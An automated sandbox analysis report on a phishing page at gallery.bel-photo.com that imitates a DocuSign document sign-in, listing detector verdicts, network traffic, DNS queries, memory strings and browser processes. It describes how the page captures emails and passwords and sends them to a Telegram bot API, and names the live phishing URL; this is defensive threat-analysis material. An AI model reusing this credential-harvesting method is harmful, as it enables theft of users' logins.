Source: https://gallery.bel-photo.com/EU/ |
Avira URL Cloud: detection malicious, Label: phishing |
Source: https://gallery.bel-photo.com/EU/ |
SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social usering |
Source: https://gallery.bel-photo.com/EU/ |
LLM: Score: 8 brands: DocuSign Reasons: The URL 'gallery.bel-photo.com' does not match the legitimate domain associated with DocuSign, which is 'docusign.com'. The page asks for an email password to view a document, which is a common phishing technique to steal credentials. The domain name is suspicious and does not align with the brand's official domain. DOM: 0.0.pages.csv |
Source: https://gallery.bel-photo.com/EU/ |
Matcher: Template: docusign matched with high similarity |
Source: Yara match |
File source: 0.0.pages.csv, type: HTML |
Source: Yara match |
File source: dropped/chromecache_50, type: DROPPED |
Source: https://gallery.bel-photo.com/EU/ |
LLM: Score: 10 Reasons: The JavaScript code captures the user's email and password, then sends this sensitive information to a Telegram bot. This behavior is indicative of phishing and credential theft. DOM: 0.0.pages.csv |
Source: https://gallery.bel-photo.com/EU/ |
LLM: Score: 7 Reasons: The code extracts an email address from the URL hash and uses it to populate form fields and an image source. This behavior is typical of phishing attempts to personalize the page based on the user's email. Additionally, the use of external resources (e.g., logo.clearbit.com) could be used to track or identify the user. DOM: 0.0.pages.csv |
Source: https://gallery.bel-photo.com/EU/ |
HTTP Parser: Number of links: 0 |
Source: https://gallery.bel-photo.com/EU/ |
HTTP Parser: <input type="password" .../> found but no <form action="... |
Source: https://gallery.bel-photo.com/EU/ |
HTTP Parser: Title: View Secure Document - Sign in does not match URL |
Source: https://gallery.bel-photo.com/EU/ |
HTTP Parser: On click: sendEmail() |
Source: https://gallery.bel-photo.com/EU/ |
HTTP Parser: <input type="password" .../> found |
Source: https://gallery.bel-photo.com/EU/ |
HTTP Parser: No <meta name="author".. found |
Source: https://gallery.bel-photo.com/EU/ |
HTTP Parser: No <meta name="copyright".. found |
Source: unknown |
HTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.6:49714 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.6:49717 version: TLS 1.2 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.18.97.153 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /EU/ HTTP/1.1Host: gallery.bel-photo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /data/icons/logos-and-brands/512/27_Pdf_File_Type_Adobe_logo_logos-512.png HTTP/1.1Host: cdn4.iconfinder.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /C8yD9g5/US-payment-terms-1.jpg HTTP/1.1Host: i.ibb.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /data/icons/logos-and-brands/512/27_Pdf_File_Type_Adobe_logo_logos-512.png HTTP/1.1Host: cdn4.iconfinder.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /C8yD9g5/US-payment-terms-1.jpg HTTP/1.1Host: i.ibb.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com |
Source: global traffic |
DNS traffic detected: DNS query: gallery.bel-photo.com |
Source: global traffic |
DNS traffic detected: DNS query: cdn4.iconfinder.com |
Source: global traffic |
DNS traffic detected: DNS query: i.ibb.co |
Source: global traffic |
DNS traffic detected: DNS query: logo.clearbit.com |
Source: global traffic |
DNS traffic detected: DNS query: www.google.com |
Source: chromecache_50.2.dr |
String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js |
Source: chromecache_50.2.dr |
String found in binary or memory: https://api.telegram.org/bot$ |
Source: chromecache_50.2.dr |
String found in binary or memory: https://cdn4.iconfinder.com/data/icons/logos-and-brands/512/27_Pdf_File_Type_Adobe_logo_logos-512.pn |
Source: chromecache_50.2.dr |
String found in binary or memory: https://i.ibb.co/C8yD9g5/US-payment-terms-1.jpg |
Source: chromecache_50.2.dr |
String found in binary or memory: https://logo.clearbit.com/ |
Source: unknown |
Network traffic detected: HTTP traffic on port 49708 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49674 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49672 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49704 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49729 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49713 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49717 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49715 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49716 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49715 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49717 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49714 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49713 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49711 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49698 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49709 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49698 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49673 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49711 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49709 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49708 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49729 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49716 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49714 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49704 |
Source: unknown |
HTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.6:49714 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.6:49717 version: TLS 1.2 |
Source: classification engine |
Classification label: mal76.phis.win@16/12@14/10 |
Source: unknown |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" |
|
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1904,i,7118842407287733611,2763941164702306614,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 |
|
Source: unknown |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://gallery.bel-photo.com/EU/" |
|
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1904,i,7118842407287733611,2763941164702306614,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: Window Recorder |
Window detected: More than 3 window changes detected |